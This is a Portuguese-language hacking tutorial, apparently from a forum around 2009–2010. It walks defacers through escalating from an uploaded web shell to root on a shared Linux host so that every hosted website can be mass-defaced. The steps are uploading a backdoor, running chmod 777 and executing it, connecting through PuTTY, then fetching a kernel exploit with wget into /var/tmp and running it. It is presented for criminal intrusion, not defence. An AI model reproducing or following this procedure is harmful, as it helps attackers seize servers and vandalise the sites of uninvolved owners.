+----------------------------------------------------------------------+
| Adquirindo Acesso Total em Servidores Linux |
+----------------------------------------------------------------------+
[0] .-------------------: Introdução :
Acesso ao root em servidores linux; muitos defacers conseguem explorar diversas falhas de SQL Injection
RFI (Remote File Inclusion), Cross Site Scripting entre outras vulnerabilidades. Quando fazem o upload de uma Shell
no sistema apenas trocam a Página Principal de um único website no Servidor. Esse tutorial mostra como entrar no sistema
e ter acesso a todos os websites hospedados no servidor, assim o defacer conseguirá fazer um Defacer em Massa (Mass
Defacer).
[1] .-------------------: Primeiro passo;
Já com o à Shell upada no Servidor faça o Upload de um [Backdoor] que pode ser encontrado facilmente nos sites:
# Exploit-DB.com # Milw0rm.com # Inj3ct0r.com # Exploits.GuiaDoHacker.Com #
[2] .-------------------: Segundo passo;
Agora iremos dar permissões ao backdoor. Execute o seguinte comando (sem chaves).
[ chmod 777 backdoor ] (sem chaves)
No caso de chmod 777 'backdoor' representa o nome do seu backdoor, se você fez o upload dele com
o nome de attack você deve executar o comando [ chmod 777 attack ].
[3] .-------------------: Terceiro passo;
Agora vamos executar o comando para mostrar a portal da shell e a versão do Kernel. Execute o seguinte comando:
[ ./backdoor ] (sem chaves) - 'backdoor representa o nome de seu backdoor, ou seja, como citei a cima [2].
[4] .-------------------: Quarto passo;
Preciso descobrir o IP do Servidor.
Abra o Prompt de Comando digitando no menu executar cmd.exe;
Digite o comando: ping -t Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Retornará o resultados e o IP.
[5] .-------------------: Quinto passo;
Faça o download do programa PuTTY client SGG and telnet; instale em sua máquina.
Abra o PuTTY e coloque o IP e a Porta mostrada no Terceiro Passo; [3].
Se tudo correr bem, você estará conectado a Shell do Servidor.
Procure o Exploit (XPL) da Versão Kernel adquirida no passo [3] nos sites:
# Exploit-DB.com # Milw0rm.com # Inj3ct0r.com # Exploits.GuiaDoHacker.Com #
[6] .-------------------: Sexto e último passo;
Abra novamente a Shell Upada no Servidor e execute os comandos:
[ cd/var/tmp ] (tmp é um diretório, mas pode ter outro nome o padrão é 'tmp'.
[ wget exploit.pl ] ( 'exploit.pl' pode estar com outro nome, no meu caso esta como 'exploit.pl'.
[ chmod 777 exploit.pl ]
[ ./exploit ]
~~ Root Adquirido ~~ Agora você tem acesso total ao servidor.
[x] .-------------------------------------------: Informações:
# Author: #Expl0it
# Date: 20/08/2009 (posted on the site 10/07/2010
# E-mail: exploit@guiadohacker.com.br
# Greetz to: h4ck3r4lp, Bruno_menor, bolinhaxp, 5ubzer0 and all members Guia do Hacker BR.
[x] .--------------------------------------------|
/* # Guia do Hacker - Todos direitos reservados # */
Comment